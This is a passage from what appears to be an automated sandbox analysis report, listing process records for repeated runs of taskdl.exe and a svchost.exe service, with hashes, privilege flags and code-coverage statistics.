Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	27
Start time:	19:50:37
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	28
Start time:	19:50:38
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	34
Start time:	19:50:39
Start date:	25/07/2024
Path:	C:\Users\user\Desktop\taskdl.exe
Wow64 process (32bit):	true
Commandline:	taskdl.exe
Imagebase:	0x400000
File size:	20'480 bytes
MD5 hash:	4FEF5E34143E646DBF9907C4374276F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	38
Start time:	19:50:41
Start date:	25/07/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Execution Coverage:	25.9%
Dynamic/Decrypted Code Coverage:	54.3%
Signature Coverage:	29.2%
Total number of Nodes:	1442
Total number of Limit Nodes:	124

Execution Coverage:	28.6%
Dynamic/Decrypted Code Coverage:	10.4%
Signature Coverage:	14.5%
Total number of Nodes:	297
Total number of Limit Nodes:	10

Execution Coverage:	24.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	94
Total number of Limit Nodes:	1